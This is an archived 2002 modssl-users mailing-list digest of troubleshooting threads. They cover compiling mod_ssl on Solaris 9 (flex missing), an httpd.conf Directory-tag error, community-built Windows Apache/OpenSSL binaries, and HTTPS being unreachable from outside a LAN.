Subject: RE: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 
Date: Wed, 2 Oct 2002 17:51:18 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C26A3C.4F9B58C9"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zandi Patrick S TSgt AFRL/IFOSS 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C26A3C.4F9B58C9
Content-Type: text/plain

Well it compiles anyhoo.. 
After make, 
make certificate, 
and make install   now if I type apachectl start   or apachectl startssl  
Core Segmentation errors.

-----Original Message-----
From: Zandi Patrick S TSgt AFRL/IFOSS [mailto:Patrick.Zandi@rl.af.mil] 
Sent: Wednesday, October 02, 2002 1:41 PM
To: 'modssl-users@modssl.org'
Subject: RE: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 


It worked -- It figures.. Where did you find that is the Doc's ?
I did not have to do that with solaris 8 !
= 8 ^)

-----Original Message-----
From: Julian R Panchen [mailto:julian@panchen.org] 
Sent: Wednesday, October 02, 2002 1:17 PM
To: modssl-users@modssl.org
Subject: RE: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 


You need a copy of flex you can obtain the source code from GNU see
http://www.gnu.org/software/flex/  

 

I am running Apache  1.3.26 and mod_ssl 2.8.10 on Solaris 9 with no
problems.

Regards

Julian R Panchen

 

-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Zandi Patrick S TSgt AFRL/IFOSS
Sent: 02 October 2002 17:57
To: 'modssl-users@modssl.org'
Subject: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 

 

Hello folks, 

    I getting strange errors on compile.   Anyone See this.. or have any
ideas

Mod_ssl seems to work fine with

./configure \

--with-apache=../apache_1.3.26 \

--with-ssl=/usr/lcoal/ssl/ \

--prefix=/apache

 

However When I compile the apache I am getting the following.. 

     EEDED `../../apaci` -DSSL_COMPAT -I/usr/local/ssl/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_scache_shmcb.c
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 -DMOD_SSL=208110
-DEAPI -DUSE_EXPAT -I../../lib/expat-lite -DNO_DL_NEEDED `../../apaci`
-DSSL_COMPAT -I/usr/local/ssl/include -DMOD_SSL_VERSION=\"2.8.10\"
ssl_expr.c
flex -Pssl_expr_yy -s -B ssl_expr_scan.l
sh: flex: not found
*** Error code 1
make: Fatal error: Command failed for target `ssl_expr_scan.c'
Current working directory
/home/oracle/building/apache_1.3.26/src/modules/ssl
*** Error code 1
make: Fatal error: Command failed for target `all'
Current working directory /home/oracle/building/apache_1.3.26/src/modules
*** Error code 1
make: Fatal error: Command failed for target `subdirs'
Current working directory /home/oracle/building/apache_1.3.26/src
*** Error code 1
make: Fatal error: Command failed for target `build-std'
Current working directory /home/oracle/building/apache_1.3.26
*** Error code 1
make: Fatal error: Command failed for target `build'




---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.393 / Virus Database: 223 - Release Date: 30/09/2002



------_=_NextPart_001_01C26A3C.4F9B58C9
Content-Type: text/html




Message






Well 
it compiles anyhoo.. 


After 
make, 


make 
certificate, 


and 
make install   now if I type apachectl start   or apachectl 
startssl  


Core 
Segmentation errors.



  

  
-----Original Message-----
From: Zandi Patrick S 
  TSgt AFRL/IFOSS [mailto:Patrick.Zandi@rl.af.mil] 
Sent: Wednesday, 
  October 02, 2002 1:41 PM
To: 
  'modssl-users@modssl.org'
Subject: RE: mod_ssl-2.8.10-1.3.26 on 
  Solaris 9 getting errors 


  
It 
  worked -- It figures.. Where did you find that is the Doc's 
  ?

  
I 
  did not have to do that with solaris 8 !

  
= 8 
  ^)

  

    

    
-----Original Message-----
From: Julian R 
    Panchen [mailto:julian@panchen.org] 
Sent: Wednesday, October 02, 
    2002 1:17 PM
To: modssl-users@modssl.org
Subject: RE: 
    mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 


    

    
You need a copy of 
    flex you can obtain the source code from GNU see http://www.gnu.org/software/flex/

    
 

    
I am running 
    Apache  1.3.26 and mod_ssl 2.8.10 on Solaris 9 with no 
    problems.

    
Regards

    
Julian R 
    Panchen

    
 

    
-----Original 
    Message-----
From: 
    owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] 
    On Behalf Of Zandi Patrick S 
    TSgt AFRL/IFOSS
Sent: 02 
    October 2002 17:57
To: 
    'modssl-users@modssl.org'
Subject: mod_ssl-2.8.10-1.3.26 on 
    Solaris 9 getting errors 

    
 

    

    
Hello 
    folks, 

    

    
    
    I getting strange errors on compile.   Anyone See this.. or have 
    any ideas

    

    
Mod_ssl seems to 
    work fine with

    

    
./configure \

    

    
--with-apache=../apache_1.3.26 
    \

    

    
--with-ssl=/usr/lcoal/ssl/ 
    \

    

    
--prefix=/apache

    

    
 

    

    
However When 
    I compile the apache I am getting the 
    following.. 

    

    
     EEDED 
    `../../apaci` -DSSL_COMPAT -I/usr/local/ssl/include 
    -DMOD_SSL_VERSION=\"2.8.10\" ssl_scache_shmcb.c
gcc -c  
    -I../../os/unix -I../../include   -DSOLARIS2=290 -DMOD_SSL=208110 
    -DEAPI -DUSE_EXPAT -I../../lib/expat-lite -DNO_DL_NEEDED `../../apaci` 
    -DSSL_COMPAT -I/usr/local/ssl/include -DMOD_SSL_VERSION=\"2.8.10\" 
    ssl_expr.c
flex -Pssl_expr_yy -s -B ssl_expr_scan.l
sh: flex: not 
    found
*** Error code 1
make: Fatal error: Command failed for target 
    `ssl_expr_scan.c'
Current working directory 
    /home/oracle/building/apache_1.3.26/src/modules/ssl
*** Error code 
    1
make: Fatal error: Command failed for target `all'
Current working 
    directory /home/oracle/building/apache_1.3.26/src/modules
*** Error code 
    1
make: Fatal error: Command failed for target `subdirs'
Current 
    working directory /home/oracle/building/apache_1.3.26/src
*** Error code 
    1
make: Fatal error: Command failed for target `build-std'
Current 
    working directory /home/oracle/building/apache_1.3.26
*** Error code 
    1
make: Fatal error: Command failed for target 
    `build'



    
---
Outgoing mail is certified Virus Free.
Checked by 
    AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.393 / Virus 
    Database: 223 - Release Date: 
30/09/2002


------_=_NextPart_001_01C26A3C.4F9B58C9--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  2 19:57:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA21466; Wed, 2 Oct 2002 19:56:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from jul-solserv.panchen.org id TAA21457; Wed, 2 Oct 2002 19:56:04 +0200 (MET DST)
Received: (qmail 22370 invoked from network); 2 Oct 2002 17:55:58 -0000
Received: from jul-xppro.panchen.org (HELO julxppro) (10.40.110.15)
  by jul-solserv.panchen.org with SMTP; 2 Oct 2002 17:55:58 -0000
From: "Julian R Panchen" 
To: 
Subject: RE: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 
Date: Wed, 2 Oct 2002 18:56:05 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_001C_01C26A45.5C7BF370"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.4024
Importance: Normal
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Disposition-Notification-To: "Julian R Panchen" 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Julian R Panchen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_001C_01C26A45.5C7BF370
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit

Glad to be of help.

 

Flex was included in the Solaris 8 free software did you may have gotten
it from there.

 

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Zandi Patrick S TSgt
AFRL/IFOSS
Sent: 02 October 2002 18:41
To: 'modssl-users@modssl.org'
Subject: RE: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 

 

It worked -- It figures.. Where did you find that is the Doc's ?

I did not have to do that with solaris 8 !

= 8 ^)

-----Original Message-----
From: Julian R Panchen [mailto:julian@panchen.org] 
Sent: Wednesday, October 02, 2002 1:17 PM
To: modssl-users@modssl.org
Subject: RE: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 

You need a copy of flex you can obtain the source code from GNU see
HYPERLINK
"http://www.gnu.org/software/flex/"http://www.gnu.org/software/flex/

 

I am running Apache  1.3.26 and mod_ssl 2.8.10 on Solaris 9 with no
problems.

Regards

Julian R Panchen

 

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Zandi Patrick S TSgt
AFRL/IFOSS
Sent: 02 October 2002 17:57
To: 'modssl-users@modssl.org'
Subject: mod_ssl-2.8.10-1.3.26 on Solaris 9 getting errors 

 

Hello folks, 

    I getting strange errors on compile.   Anyone See this.. or have any
ideas

Mod_ssl seems to work fine with

./configure \

--with-apache=../apache_1.3.26 \

--with-ssl=/usr/lcoal/ssl/ \

--prefix=/apache

 

However When I compile the apache I am getting the following.. 

     EEDED `../../apaci` -DSSL_COMPAT -I/usr/local/ssl/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_scache_shmcb.c
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290
-DMOD_SSL=208110 -DEAPI -DUSE_EXPAT -I../../lib/expat-lite
-DNO_DL_NEEDED `../../apaci` -DSSL_COMPAT -I/usr/local/ssl/include
-DMOD_SSL_VERSION=\"2.8.10\" ssl_expr.c
flex -Pssl_expr_yy -s -B ssl_expr_scan.l
sh: flex: not found
*** Error code 1
make: Fatal error: Command failed for target `ssl_expr_scan.c'
Current working directory
/home/oracle/building/apache_1.3.26/src/modules/ssl
*** Error code 1
make: Fatal error: Command failed for target `all'
Current working directory
/home/oracle/building/apache_1.3.26/src/modules
*** Error code 1
make: Fatal error: Command failed for target `subdirs'
Current working directory /home/oracle/building/apache_1.3.26/src
*** Error code 1
make: Fatal error: Command failed for target `build-std'
Current working directory /home/oracle/building/apache_1.3.26
*** Error code 1
make: Fatal error: Command failed for target `build'

 

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.393 / Virus Database: 223 - Release Date: 30/09/2002


---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.393 / Virus Database: 223 - Release Date: 30/09/2002
 

------=_NextPart_000_001C_01C26A45.5C7BF370
Content-Type: text/html;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable









Message











You need a copy of flex you can =
obtain the
source code from GNU see http://www.gnu.org/software/fl=
ex/



 



I am running Apache  1.3.26 =
and
mod_ssl 2.8.10 on Solaris 9 with no problems.



Regards



Julian R Panchen



 



-----Original
Message-----

From:
owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
On Behalf Of Zandi Patrick S TSgt
AFRL/IFOSS

Sent: 02 October 2002 =
17:57

To: =
'modssl-users@modssl.org'

Subject: =
mod_ssl-2.8.10-1.3.26 on
Solaris 9 getting errors 



 






Hello
folks, 









  &nbs=
p;
I getting strange errors on compile.   Anyone See this.. or =
have any
ideas









Mod_ssl
seems to work fine with









./configure =
;\









--with-apache=3D=
../apache_1.3.26
\









--with-ssl=3D/us=
r/lcoal/ssl/
\









--prefix=3D/apac=
he









 









However Whe=
n
I compile the apache I am getting the =
following.. 









  &nbs=
p;  EEDED
`../../apaci` -DSSL_COMPAT -I/usr/local/ssl/include
-DMOD_SSL_VERSION=3D\"2.8.10\" ssl_scache_shmcb.c

gcc -c  -I../../os/unix -I../../include   =
-DSOLARIS2=3D290
-DMOD_SSL=3D208110 -DEAPI -DUSE_EXPAT -I../../lib/expat-lite =
-DNO_DL_NEEDED
`../../apaci` -DSSL_COMPAT -I/usr/local/ssl/include
-DMOD_SSL_VERSION=3D\"2.8.10\" ssl_expr.c

flex -Pssl_expr_yy -s -B ssl_expr_scan.l

sh: flex: not found

*** Error code 1

make: Fatal error: Command failed for target `ssl_expr_scan.c'

Current working directory =
/home/oracle/building/apache_1.3.26/src/modules/ssl

*** Error code 1

make: Fatal error: Command failed for target `all'

Current working directory =
/home/oracle/building/apache_1.3.26/src/modules

*** Error code 1

make: Fatal error: Command failed for target `subdirs'

Current working directory /home/oracle/building/apache_1.3.26/src

*** Error code 1

make: Fatal error: Command failed for target `build-std'

Current working directory /home/oracle/building/apache_1.3.26

*** Error code 1

make: Fatal error: Command failed for target `build'













Glad to be of =
help.



 



Flex was included in the Solaris 8 =
free
software did you may have gotten it from there.



 



-----Original
Message-----

From: =
owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On
Behalf Of Zandi Patrick S TSgt AFRL/IFOSS

Sent: 02 October 2002 =
18:41

To: =
'modssl-users@modssl.org'

Subject: RE: =
mod_ssl-2.8.10-1.3.26
on Solaris 9 getting errors 



 






It worked -- It =
figures..
Where did you find that is the Doc's ?









I did not have =
to do that
with solaris 8 !









=3D 8 =
^)









-----Original Message-----

From: Julian R Panchen =
[mailto:julian@panchen.org]


Sent: Wednesday, October =
02, 2002
1:17 PM

To: =
modssl-users@modssl.org

Subject: RE: =
mod_ssl-2.8.10-1.3.26
on Solaris 9 getting errors 





<Directory=20
/>
    Options =
FollowSymLinks
   =20
AllowOverride None
</Directory>  

This is =
the Standard=20
Syntax Right ?

So I added one here the </Directory>  Below

# This =
should be=20
changed to whatever you set DocumentRoot to.
#
<Directory=20
"/apache/htdocs">
</Directory>

So=20
If this is above correct...   Now I am getting this is not =
allowed=20
here for
#
# This controls which options the .htaccess files in=20
directories can
# override. Can also be "All", or any combination of =

"Options", "FileInfo",
# "AuthConfig", and=20
"Limit"
#
##    AllowOverride=20
None


-----Original Message-----
From: Jeff Bert =
[mailto:soilentg@sgwebspace.com]
Sent:=20
Friday, October 04, 2002 9:56 PM
To: =
modssl-users@modssl.org
Subject: Re:=20
ErrorLog not allowed here


Did you put it inside a Directory=20
tag?  It's not allowed there. 

Jeff

> =
Hello,
>=20
./httpd -t
> Syntax error on line 469 of =
/apache/conf/httpd.conf:
>=20
ErrorLog not allowed here
>
> Why is this not allowed =
here..=20
??  Do all the <Directory > Tags have
> to match ? Is =
this the=20
issue ?
>
>=20
______________________________________________________________________>=20
Apache Interface to OpenSSL=20
(mod_ssl)          &nb=
sp;       =20
www.modssl.org
> User Support Mailing=20
List           &n=
bsp;         =20
modssl-users@modssl.org
> Automated List=20
Manager           =
;            =
;    =20
majordomo@modssl.org
>

____________________________________=
__________________________________
Apache=20
Interface to OpenSSL=20
(mod_ssl)          &nb=
sp;       =20
www.modssl.org
User Support Mailing=20
List           &n=
bsp;         =20
modssl-users@modssl.org
Automated List=20
Manager           =
;            =
;    =20
majordomo@modssl.org


------_=_NextPart_001_01C26C13.86F77AC0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct  5 10:36:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA00657; Sat, 5 Oct 2002 10:35:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sol-roth.sgwebspace.com id KAA00653; Sat, 5 Oct 2002 10:35:01 +0200 (MET DST)
Received: from Linksys (unknown [63.226.251.130])
	by sol-roth.sgwebspace.com (Postfix) with ESMTP id C08F5BF8AE
	for ; Sat,  5 Oct 2002 01:34:17 -0700 (PDT)
Message-ID: <001601c26c49$df14f420$6401a8c0@Linksys>
From: "Jeff Bert" 
To: 
References: 
Subject: Re: ErrorLog not allowed here
Date: Sat, 5 Oct 2002 01:33:24 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Bert" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Messagelooks like you added a  close tag that shouldn't have
been put there like this:




## So everything below that /Directory you added is no longer properly
contained in a  like it should be.
## AllowOverride Note
#
# more code
....
...



Jeff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct  5 23:09:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA14189; Sat, 5 Oct 2002 23:08:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts15-srv.bellnexxia.net id XAA14184; Sat, 5 Oct 2002 23:07:53 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts15-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021005210745.GVHK11600.tomts15-srv.bellnexxia.net@sympatico.ca>
          for ; Sat, 5 Oct 2002 17:07:45 -0400
Message-ID: <3D9F54B4.30004@sympatico.ca>
Date: Sat, 05 Oct 2002 17:08:04 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Windows binaries for Apache
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Apache users...

Recent updates to the source has made it necessary to rebuild the Apache 
binaries that I previously made available.  If you want to upgrade to 
the latest code please help yourselves.  Note: I have only built the 
code and not tested any of it.  Next week I will begin testing the 
Apache2 code for my own use, but I don't use the Apache1 code.

http://hunter.campbus.com/Apache_1.3.27-Mod_SSL_2.8.11-OpenSSL_0.9.6g-Win32.zip
http://hunter.campbus.com/Openssl-0.9.6g-Win32.zip

http://hunter.campbus.com/Apache_2.0.43-OpenSSL_0.9.6g-Win32.zip

If you have any problems contact me on the list, as
 or at my personal account: hunter@tor.ath.cx

Chris.

Legal Notice
------------

These software packages are provided free of charge. It uses strong 
cryptography that is regulated by export/import/use restrictions in some 
parts of the world.

PLEASE NOTE THAT EXPORT/IMPORT/USE OF STRONG CRYPTOGRAPHY SOFTWARE, 
PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING TECHNICAL 
DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME PARTS OF THE 
WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR COUNTRY, RE-DISTRIBUTE 
IT FROM THERE OR EVEN JUST EMAIL TECHNICAL SUGGESTIONS OR SOURCE PATCHES 
TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY ADVISED TO PAY CLOSE 
ATTENTION TO ANY EXPORT/IMPORT/USE LAWS WHICH APPLY TO YOU. WE NOR THE 
AUTHORS OF THE REPRESENTED SOFTWARE PACKAGES ARE OR WILL BE HELD LIABLE 
FOR ANY VIOLATIONS YOU MAKE. BE CAREFUL, IT IS YOUR RESPONSIBILITY.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Oct  6 02:06:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA18240; Sun, 6 Oct 2002 02:05:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from krusty.unitec.edu.ve id CAA18233; Sun, 6 Oct 2002 02:04:47 +0200 (MET DST)
Received: by KRUSTY with Internet Mail Service (5.5.2448.0)
	id <4KGL9K90>; Sat, 5 Oct 2002 20:16:22 -0400
Message-ID: <6187787D77C6D111BC4B006008A2E26917795E@KRUSTY>
From: Medina Malpica Victor 
To: "'modssl-users@modssl.org'" 
Subject: Apache 2.0.40 and OpenSSL
Date: Sat, 5 Oct 2002 20:16:22 -0400 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C26CCD.99B01246"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Medina Malpica Victor 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C26CCD.99B01246
Content-Type: text/plain;
	charset="windows-1252"

Recently I needed a development environment based on Apache 2, php4 and ssl
for windows, it was and intranet application for a bank (that was the reason
for the ssl) I built a installer with the apache 2 and ssl, and also
included the MySQL data base.

It has performed just fine under medium load, haven't try it under heavy
load.

I put it in my university ftp, if you want you can download it and try it, I
believe they are quite stable.

You can send me email if you want some sort of support or comments on how to
improve it. I also have a sourceforge project but haven't upload the latest
release. (sourceforge.net/projects/ikirux)

The latest binary are here:

ftp://route.unitec.edu.ve/VictorMedina/IkiruxProject/

FileNamer: IKIRUX_WSP_Pro1Beta4_ENG.zip

Victor Medina
PS: I would really apreaciate some feedback on this, bugs, etc



Legal Notice
------------

These software packages are provided free of charge. It uses strong 
cryptography that is regulated by export/import/use restrictions in some

parts of the world.

PLEASE NOTE THAT EXPORT/IMPORT/USE OF STRONG CRYPTOGRAPHY SOFTWARE, 
PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING TECHNICAL 
DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME PARTS OF THE 
WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR COUNTRY, RE-DISTRIBUTE 
IT FROM THERE OR EVEN JUST EMAIL TECHNICAL SUGGESTIONS OR SOURCE PATCHES

TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY ADVISED TO PAY CLOSE 
ATTENTION TO ANY EXPORT/IMPORT/USE LAWS WHICH APPLY TO YOU. WE NOR THE 
AUTHORS OF THE REPRESENTED SOFTWARE PACKAGES ARE OR WILL BE HELD LIABLE 
FOR ANY VIOLATIONS YOU MAKE. BE CAREFUL, IT IS YOUR RESPONSIBILITY.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C26CCD.99B01246
Content-Type: text/html;
	charset="windows-1252"
Content-Transfer-Encoding: quoted-printable






Apache 2.0.40 and OpenSSL




Recently I needed a development environment based on =
Apache 2, php4 and ssl for windows, it was and intranet application for =
a bank (that was the reason for the ssl) I built a installer with the =
apache 2 and ssl, and also included the MySQL data base.



It has performed just fine under medium load, haven't =
try it under heavy load.




I put it in my university ftp, if you want you can =
download it and try it, I believe they are quite stable.




You can send me email if you want some sort of =
support or comments on how to improve it. I also have a sourceforge =
project but haven't upload the latest release. =
(sourceforge.net/projects/ikirux)



The latest binary are here:




ftp://route.unitec.edu.ve/VictorMedina/IkiruxProject/<=
/A>




FileNamer: IKIRUX_WSP_Pro1Beta4_ENG.zip




Victor Medina

PS: I would really apreaciate some feedback on this, =
bugs, etc








Legal Notice

------------




These software packages are provided free of charge. =
It uses strong 

cryptography that is regulated by export/import/use =
restrictions in some




parts of the world.




PLEASE NOTE THAT EXPORT/IMPORT/USE OF STRONG =
CRYPTOGRAPHY SOFTWARE, 

PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST =
COMMUNICATING TECHNICAL 

DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN =
SOME PARTS OF THE 

WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR =
COUNTRY, RE-DISTRIBUTE 

IT FROM THERE OR EVEN JUST EMAIL TECHNICAL =
SUGGESTIONS OR SOURCE PATCHES




TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY =
ADVISED TO PAY CLOSE 

ATTENTION TO ANY EXPORT/IMPORT/USE LAWS WHICH APPLY =
TO YOU. WE NOR THE 

AUTHORS OF THE REPRESENTED SOFTWARE PACKAGES ARE OR =
WILL BE HELD LIABLE 

FOR ANY VIOLATIONS YOU MAKE. BE CAREFUL, IT IS YOUR =
RESPONSIBILITY.




_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org





------_=_NextPart_001_01C26CCD.99B01246--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Oct  6 16:06:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA07802; Sun, 6 Oct 2002 16:05:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.merritech.com id QAA07432; Sun, 6 Oct 2002 16:04:02 +0200 (MET DST)
Received: from unknown(200.0.0.115) by mail.merritech.com via csmap 
	 id 12525; Sun, 06 Oct 2002 10:02:19 -0400 (EDT)
Received: from Spooler by merritech (Mercury/32 v3.32) ID MO000DC4;
  6 Oct 02 10:03:59 -0400
Received: from spooler by merritech.com (Mercury/32 v3.32); 6 Oct 02 10:03:56 -0400
Received: from bordermgr1.mth (200.0.0.113) by merritech (Mercury/32 v3.32) with ESMTP ID MG000DC3;
   6 Oct 02 10:03:52 -0400
Received: from BORDERMGR1/SpoolDir by bordermgr1.mth (Mercury 1.48);
    6 Oct 02 10:03:46 -0500
Received: from SpoolDir by BORDERMGR1 (Mercury 1.48); 6 Oct 02 10:03:16 -0500
Received: from umsteadj (64.91.25.128) by bordermgr1.mth (Mercury 1.48) with ESMTP;
    6 Oct 02 10:03:09 -0500
From: "Jeff Umstead" 
To: modssl-users@modssl.org
Date: Sun, 06 Oct 2002 10:03:13 -0400
MIME-Version: 1.0
Subject: SSL Not Working from Outside LAN
Message-ID: <3DA00A61.23617.4AE22F@localhost>
X-mailer: Pegasus Mail for Windows (v4.02a)
Content-type: text/plain
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-NAIMIME-Disclaimer: 1
X-NAIMIME-Modified: 1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Umstead" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've recently added a Red Hat 7.3 Linux server to our network running Apache and 
mod_ssl.  My problem is I can't make an https (over standard port 443) connection from 
outside our network.  I can connect via http (port 80) from both inside and outside our 
LAN.  

I have the necessary port pass throughs, firewall rules etc in place for both ports.  It 
works perfectly from inside our lan (subnet) to either http or https but not from our other 
sites (different subnets) or from the internet.

I believe the problem is either an incorrect setting in httpd.conf or perhaps in a network 
configuration file I've overlooked.  Or ???

Any help / tips  would be greatly appreciated.

Thanks
--
Jeff Umstead
IS Director
Merrill Tool Holding Company
Saginaw MI USA



This e-mail (and attachment(s)) has been virus scanned by
McAfee WebShield.

This message is intended only for use of the individual or
entity to whom it is addressed, and may contain information
that is privileged, confidential and exempt from disclosure
under applicable law.  If the reader of this message is not
the intended recipient, or the employee or agent
responsible for delivering the message to the intended
recipient, you are hereby notified that any unauthorized
use, dissemination, distribution or copying of this e-mail
or attachments, in whole or in part is strictly prohibited
and may be unlawful.  If you have received this message in
error, please inform the sender by replying to this message
and then delete the message and any attachments from your
system and destroy all copies. Thank You


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Oct  6 16:10:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA07977; Sun, 6 Oct 2002 16:09:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns.istop.com id QAA07972; Sun, 6 Oct 2002 16:09:01 +0200 (MET DST)
Received: by ns.istop.com (Postfix, from userid 506)
	id 7B19D1755B; Sun,  6 Oct 2002 10:10:30 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1])
	by ns.istop.com (Postfix) with ESMTP id 792C51755A
	for ; Sun,  6 Oct 2002 10:10:30 -0400 (EDT)
Date: Sun, 6 Oct 2002 10:10:30 -0400 (EDT)
From: Jeffrey Burgoyne 
X-Sender: burgoyne@ns.istop.com
To: "modssl-users@modssl.org" 
Subject: Re: SSL Not Working from Outside LAN
